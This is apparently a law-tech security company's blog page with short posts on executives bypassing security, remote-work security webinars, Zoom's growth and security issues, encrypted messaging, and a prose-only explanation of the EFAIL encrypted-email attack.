Who is putting security at risk? It might be your CXOs…

A new report from MobileIron, “Trouble at the Top,” is eye-popping, although perhaps not surprising to IT professionals. In fact, it might provide very helpful data in making your case for security policies within your organization.

Between February and March 2020 Vanson Bourne interviewed 300 enterprise IT decision-makers and 50 C-level executives in Europe, UK, and the US regarding their organizations’ mobile security protocols.

C-Suite executives are highly targeted for cybersecurity attacks, including phishing.

Yet “76% of C-level executives admitted to requesting to bypass one or more of their organization’s security protocols” during the last year, per the findings.

In a note of irony for IT professionals, “Almost three in four (72%) IT decision-makers also claimed the C-suite is the most likely to forget or need help with resetting their passwords,” writes ZDNet, quoting from the MobileIron study.

MobileIron’s overall point is that employees need the right tools to be secure and productive at the same time. Or, as we would say, security measures cannot afford to impair usability or people will conjure up a way around them.

There is much more in the study. You can register for the download of MobileIron’s “Trouble at the Top” report here.

-Maureen

Protect Your Data in a Remote Work Environment – ILTA Educational Webinar

Working remotely became a neccessity almost overnight. But were firm architectures ready? Two common entry points to system hacks, social engineering and network vulnerabilities, threaten the security of remote working. In this session, Mobile Helix CEO and Chief Architect, Seth Hallem, will describe these vulnerabilities and propose practical and actionable ways to address these weaknesses using safe browsing, network proxies, authentication, authorization, and DLP. These mitigations apply to both desktop and mobile devices.

This is an ILTA Educational Webinar. It is free to members as well as to non-members as part of ILTA’s COVID-19 content. Non-members may register for a free login-in.

WATCH THE RECORDED WEBINAR HERE

Outline:

I. Social engineering: Phishing, “Water Hole,” SIM card swaps

   Mitigations including:

    A. Safe browsing

    B. No SMS

    C. Web filtering via proxying

    D. Data Loss Prevention (DLP): printing, recipient checking, metadata filtering

II. Network vulnerabilities

    Mitigations including:

    A. Layered security

    B. Filter – proxy

    C. Authenticate the source – certificates, IP fencing, DoS defense

    D. Authenticate the user – AD credentials, complex passwords, SSO

    E. Authorize – manage email attachments

III. Example of a secure architecture

We welcome you and your questions on June 10th.

Write to us at: contact@mobilehelix dot com.

-Maureen

Okta Sees a COVID-19 “Zoom Boom”

If you have an office job, you likely now WFH (work from home). The odds are that you have found yourself on at least a handful of video teleconference calls in the past four weeks. There is no question that video conference services have been the backbone of the information workforce during this month of “stay-at-home”. Teachers, students, courtrooms, and television shows are going live from homes all over America.

In the process of doing research, I happened to find this April 8th post by Hector Aguilar, Okta’s President of Technology, How COVID-19 Is Changing the Way We Work: Zoom Boom + MFA is the Way. Okta is a leader in identity management and Multi-Factor Authentication. Therefore, Okta has a unique and vast window into the usage of cloud services.

We all know anecdotally that Zoom usage has been rocketing. This is the first data that I have seen comparing Zoom to other video conference services.

Percentage Increase in Unique Daily Users of Zoom, Cisco WebEx, and Ring Central from 2/24/2020 to 3/27/2020
Source: Okta

From February 28 to March 27, Cisco’s WebEx and Ring Central’s unique daily users were up about 50%, but Zoom’s were up 200%.

Zoom’s adoption has been nothing short of incredible. From yoga teachers to grandparents, people are thrilled with its ease of use. I have used quite few of the video conferencing services. Out company tried Zoom over two years ago and never looked back. Both the ease of use and the pricing were  a world apart from the other services.

Zoom has had a challenge-laden couple of weeks as the onslaught of users and attention by security analysts have exposed vulnerabilities. Some, such as “Zoom-bombing,” where intruders disrupt a session, can be managed with existing policies. Others are more serious. Zoom is reporting fixes weekly. They report that they have removed the use of the Facebook SDK in their iOS app, which was sending user data to Facebook.

School districts have banned usage of Zoom. There are three class-action law suits against Zoom.

Zoom announced yesterday that they have formed a CISO Council and an Advisory Board to look at ways to address Zoom’s security and privacy issues, with CISOs from VMware, HSBC, NTT Data, Netflix, and more participating. In what would appear to be a major coup for Zoom, Alex Stamos, former CSO at Facebook, now at Stanford, tweeted on April 8th that he will join Zoom as an outside advisor.

I’m optimistic that they will resolve most of these issues. Zoom has a lot to gain by doing so.

-Maureen

April 9, 2020

We’re an official NetDocuments ISV Partner!

We’ve been a NetDocuments partner for years. Recently, with Leonard Johnson heading up their partner ecosystem, NetDocuments have formalized their NetDocuments ISV Partner Program. We have used their REST APIs to give NetDocuments users access to their documents and their email in the same encrypted container app, LINK. NetDocuments is committed to the platform approach wherein both Independent Software Vendors and NetDocuments customers can develop solutions for optimizing their workflows using the REST APIs.

It’s easy to review, compare, annotate, file, and email documents all within our LINK app. LINK also offers a managed integration with the Microsoft Office apps for editing on an iPad or smartphone.

Continue reading

ILTA LegalSEC Summit 2019 Redux

We are back from a busier than ever ILTA LegalSEC Summit. People attend LegalSEC to genuinely learn how they can keep their law firms protected. This is no easy feat because cybersecurity is a moving target. While Big Law firms participate, there is great value for small and medium sized firms where there might not be a CISO. The Director of IT or network engineer might be the security department. The two or three days at LegalSEC are packed with information.

This year the well-received keynote by William R. Evanina, Director of the National Counterintelligence and Security Center, was recorded. Another popular session was “Leverage These Free Resources to Up Your Security and Governance Game.” Both of these and several other LegalSEC 2019 sessions can be heard at no cost by ILTA members, here.

Heads up, save the date. Next year’s LegalSEC Summit 2020 will be June 1-3 and the location…San Antonio at the Marriott Riverwalk. If you have visited the Riverwalk you know that this is a fantastic location. Hope to see you there.

Mobile Helix LINK at ILTA LegalSEC Summit 2019, June 3-5

We love LegalSEC!

and we are a sponsor again this year. We will be at Table number one showing LINK’s latest mobile DLP features.

Stop by to say hi and to see a LINK demo. Our LINK app’s encryption, containerization, and authentication provide strong security for your documents and data. Now LINK offers key word and metadata filtering, recipient checking, and restriction on emailing files from classified workspaces.

This year’s keynote speaker is William R. Evanina, Director of the National Counterintelligence and Security Center.

Register here

ILTA LegalSEC Summit 2019 Keynote Speaker William R. Evanina

LegalSEC Summit 2019 is designed for technology professionals at every level who manage security, information governance and data privacy tech projects and initiatives in support of the practice of law. This exciting two-day Summit offers premier learning and a connected networking environment to focus on information security challenges faced by the legal industry.

Is Your Email Vulnerable? Ask the Chinese Military

Image: ribkhan, Pixabay

I’m a current events junkie. I’ll admit it. And I work with law firms. Thus, my favorite podcast? “Stay Tuned with Preet.” Yes, this is Preet Bharara, the former U.S. Attorney for the Southern District of New York. Check out an episode. Preet takes a few questions about the law at the beginning of each episode. Then he has a guest. Preet is not only smart, but surprisingly personable. It’s a fast-moving hour.

A recent guest was John P. Carlin, former Assistant Attorney General for the National Security Division at the Department of Justice and Chief of Staff to Robert Mueller at the FBI. He is currently a partner with Morrison & Foerster. Carlin is an international cybersecurity expert.

One of the things which caught my attention in this episode was Carlin’s story of the US subsidiary of a German company whose data was stolen by hackers in the Chinese military. The company, SolarWorld, in Hillsboro, Oregon, made solar energy components.

How was the data stolen? Email. Carlin said, “Email. It is the least protected part of the system, usually. Not like Intellectual Property which is encrypted or where special measures are taken to protect it. They stole email traffic.”

Continue reading

ILTA Webinar: Mobile, Secure NetDocuments Workflows: NetDocuments® DMS + LINK Encrypted App

Do you use NetDocuments® DMS today or are you evaluating NetDocuments? If you are looking for an encrypted container app approach for mobile NetDocuments DMS, our LINK app may provide that extra client-side security that you are looking for.

Date and time: Monday, February 11, 2019, Noon EST

Watch a recording of the demo here

Continue reading

Our CEO in CSO: Ripped from the headlines – are your messages secure in these encrypted apps?

In the investigations of Paul Manafort and Michael Cohen, the FBI has retrieved messages from Signal, Telegram and WhatsApp. While there are weaknesses inherent in all of these apps, the question remains: What does a good data protection scheme look like?

 

A few days ago, the FBI revealed that Michael Cohen’s messages sent with Signal and WhatsApp are now available as evidence in the on-going investigation into his various dealings. While thousands of emails and documents have already been recovered from Cohen’s devices, home, hotel room, and office, the recovery of data from messaging apps that promise end-to-end encryption is surprising. One would presume that end-to-end message encryption should ensure that those messages are unrecoverable without assistance from Mr. Cohen. However, clearly that is not the case.

Continue reading

Secure Email is Cracked; What Now?

cracked pixabay rotated broken-glass-2208593__480

By Seth Hallem, Moble Helix CEO, Co-founder, & Chief Architect

Secure email using S/MIME and OpenPGP is fundamentally broken. Our CEO explains the EFAIL vulnerability and why our LINK Email is not susceptible to EFAIL. What do we do next to protect email? 

On Sunday night, a team of researchers from Germany and Belgium dropped a major bomb on the world of encrypted email by describing a simple, widely applicable, and wildly effective technique for coercing email clients to release encrypted email contents through “Exfiltration channels.”[1] The concept is simple – by using a combination of known manipulation techniques against the encryption algorithms specified in the S/MIME and OpenPGP standards and lax security choices in a wide variety of email clients, the research team was able to intercept and manipulate encrypted emails such that large blocks of the encrypted text are revealed to a malicious server.

What is most brilliant (and most dangerous) about this attack, is that the attack does not require decrypting the email messages or stealing encryption keys. Hence, the attack can be deployed as a man-in-the-middle attack on the infrastructure of the internet itself, rather than requiring that a specific email server or email client is compromised.

The essential idea behind this attack is simple – HTML emails expose a variety of reasons to query remote servers to load parts of those emails. The simplest (and most common) example of this concept is displaying embedded images. Many marketing emails use tiny embedded images to monitor who has opened an email. This technique is so pervasive that many of us have become desensitized to clicking the “Allow images from this sender” prompt in Outlook. It is common practice for marketing emails to contain embedded images with essential content, which encourages users to allow the client to load all images in that message. However, doing so loads both visible images and tiny, single pixel images that marketing tools use to uniquely determine that we have opened the email message in question.

Continue reading